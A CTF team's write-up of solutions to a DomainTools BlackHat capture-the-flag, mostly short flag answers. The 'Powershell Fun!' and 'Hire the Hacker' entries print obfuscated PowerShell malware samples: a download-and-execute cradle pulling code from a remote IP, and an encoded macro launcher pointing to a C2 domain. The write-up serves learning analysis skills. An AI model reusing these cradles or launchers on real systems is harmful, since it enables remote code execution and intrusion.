This year we'd participated in BlackHat CTF challenge organized by DomainTools.
Our team Homeless took 8th place.
Write-ups
Flip It & Reverse It! (10)
Solution:
To solve this task we wrote the words in reverse order and got next text:
domain tools rules!
And this is the flag for this task.
Powershell Fun! (20)
Solution:
We checked the file content:
& ( $enV:comSPec[4,15,25]-joiN'')(NeW-ObjECT SySTem.io.CoMPResSIOn.dEFLateSTrEam([io.MeMORYSTReAM] [SySTem.CoNvERt]::FROmbaSe64STRIng( 'PVHRitswEPwVPbSWfSSH1lpZ0j05LaUVnMWhCxgcQl98GB8hV2joS9t/76xb+mBrvJqdnR1Xqq5/HMp6+HD5pPTdMJc73dznw/BysjuiXXvev76tV60bVZ+ej2XNn88PD69v6VorrdWu1sEnIu7JuEzUFTJU2BXf9kRUiNyMarLtaGMV7EAURttmak0fQsKx2Ha20s4jiJU8louLMwQnEQPNthMbXBnQaCGKEzsMpSVCwnRbNUbpz7btfRhREKXMXR+8fM0xTJ2HuVBBd5AK5KDRTUwzd7kL8ErwHOUigzhvAzygScGK+PRvT5wGonaAKduNWKIKQVaq2GaYJ2pHFyr2mX3hODg/O4MhvWBeXAe8cKycnZwZuRs5LiA43yMItnjDZITSwBbZzNEjCAvzbrG8bDNyjJNgKjYiwZ5d5eGJCAEzoiPxh20Y/4TweEkPddNLClKSJEjCZPQnT7Jc2nIzgo1W++eny3rUs6Bvj+mo9KT3358u6aZ0/n9dSe1xvelBg3ZJR71sd1tD0sJKN13+8qV1BESHwF7/Uu/Vz1qdPn45lLM6rdfj+d3XRv1WjWqaPw==' ) , [SYStem.iO.coMPReSSIOn.COMPrESSIONMOde]::DEComPreSS) |foreAch-oBJEct{ NeW-ObjECT IO.sTreAMrEADeR($_, [SySTEm.tExT.ENcodiNg]::asCii)}| foReaCh-OBjEct {$_.rEAdTOend()} )
Then we decoded yellow string using base64 with Raw Inflate using CyberChef https://gchq.github.io/CyberChef
After that we prepared the list of number for the next string:
87I114@105N116R101R45R72@111R115d116I32W39&83M118W32N120@88I120g32d34@104W116&116&34R59d105Z101R88I32Z40&110@101g119Z45I111g98I106@101g99W116N32@78W101&116N46@87W101d98Z67R108&105M101d110I116Z41d46N68R111@119d110N108d111g97N100I83W116Z114@105Z110W103M40&36W120&88N120&43N34R112W58&47N47R49M57d50d46@49M54g56d46g49&53Z50W46W49g50d57@34@43@34&109N34M43d34d97Z103R105g34g43N34N99Z34g41R39g32@45&70W111M114d101W103@114N111N117&110d100@67R111N108&111g114g32I71Z114I101&101Z110
and got next:
87, 114, 105, 116, 101, 45, 72, 111, 115, 116, 32, 39, 83, 118, 32, 120, 88, 120, 32, 34, 104, 116, 116, 34, 59, 105, 101, 88, 32, 40, 110, 101, 119, 45, 111, 98, 106, 101, 99, 116, 32, 78, 101, 116, 46, 87, 101, 98, 67, 108, 105, 101, 110, 116, 41, 46, 68, 111, 119, 110, 108, 111, 97, 100, 83, 116, 114, 105, 110, 103, 40, 36, 120, 88, 120, 43, 34, 112, 58, 47, 47, 49, 57, 50, 46, 49, 54, 56, 46, 49, 53, 50, 46, 49, 50, 57, 34, 43, 34, 109, 34, 43, 34, 97, 103, 105, 34, 43, 34, 99, 34, 41, 39, 32, 45, 70, 111, 114, 101, 103, 114, 111, 117, 110, 100, 67, 111, 108, 111, 114, 32, 71, 114, 101, 101, 110
Then we converted from decimal to text:
And got the URL, which is the flag
Keylogging is Fun (25)
Solution:
We used scdbg for solving this task. After start we checked the result of shellcode emulation.
As a result we've got the path "C:\Windows\Temp\log.bin"
Messy JS! (30)
Solution:
We use ltrace. It intercepts and records dynamic library calls which are called by an executed process and the signals received by that process.
And we got the flag in its output:
...
[pid 3001] inet_addr("127.0.0.1") = 0x100007f
[pid 3001] htons(1984, 0x7fc68146c950, 0x100007f, 0) = 0xc007
...
Flag: 1984
Guess the Pass (40)
Solution:
After analyzing strings in binary, we discovered next data:
...
encodeeJyzMNdRMDQwBBEWOgqWlkCGIZhnCRU3NdBRMDODyZtD1RiAtZlARAwNzQDKrwzB\nbase64
...
We used CyberChef to decode and get the flag:
Flag: Welcome2Blackhat
Macho Madness (40)
Solution:
We checked ZIP file using deployed VM and got port 1337.
Flag: 1337
Doggo Secrets (10)
Solution:
After extracting we got file oh_hi.gpj .
Then we replaced the file extension to jpg and opened with image viewer.
Image had the flag DT_CTF_123!@#
Flag: DT_CTF_123!@#
Noise To Signal (20)
oh_hi.zip f
Solution:
We used text analyzer to check human-readable words.
After several minutes of searching, we discovered word phisheye that was the flag.
Flag: phisheye
Sweet logo, dude! (20)
Solution:
Firstly we unzip the file (logo.jpg was the archive).
Then we got the file hmmm.txt with the following text:
FKWcp1W1oTImZGVm
Then we tried different ways to decode and finally we got the flag:
Flag: IrisRules123
Hack the Hacker (25)
Solution:
We used Wireshark to solve the task. We checked the internal traffic and discovered IP address that brutefoced 192.168.152.135.
Finally we got the flag from basic auth header
Authorization: Basic emVyb2Nvb2w6aGFja2Vy which is base64 decoded zerocool:hacker.
Flag: hacker
Hire the Hacker (30)
Solution:
Firstly, we renamed DadeResume.docm to DadeResume.zip.
Then we checked vbaProject.bin using olevba and got someembedded PowerShell code:
...
cxn = "powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVg"
cxn = cxn + "BlAHIAUwBpAE8AbgBUAGEAYgBsAEUALgBQAFMAVgBFAFIAcwBp"
cxn = cxn + "AG8AbgAuAE0AQQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABkAD"
cxn = cxn + "MAOQA4ADIAPQBbAFIAZQBGAF0ALgBBAFMAcwBlAG0AQgBsAHkA"
...
We converted all data in cxn variables to ione string and decoded using base64.
Result had several encoded strings, after base64 decoding we got the flag.
aAB0AHQAcAA6AC8ALwBzAHUAcABlAHIAcwBlAGsAcgBlAHQAZABvAG0AYQBpAG4ALgBuAGUAdAA6ADYANgA2ADYA -> http://supersekretdomain.net:6666
Flag: supersekretdomain.net
RIP Your E-Commerce Website (40)
Solution:
After deobfuscation of js code and several minutes of analyzing, we got the flag.
Flag: http://domaintoolsctf.com/checkout/form.js
SHA1 is dead, long live SHA1! (10)
Solution:
This task was really easy, we just used sha1-online.com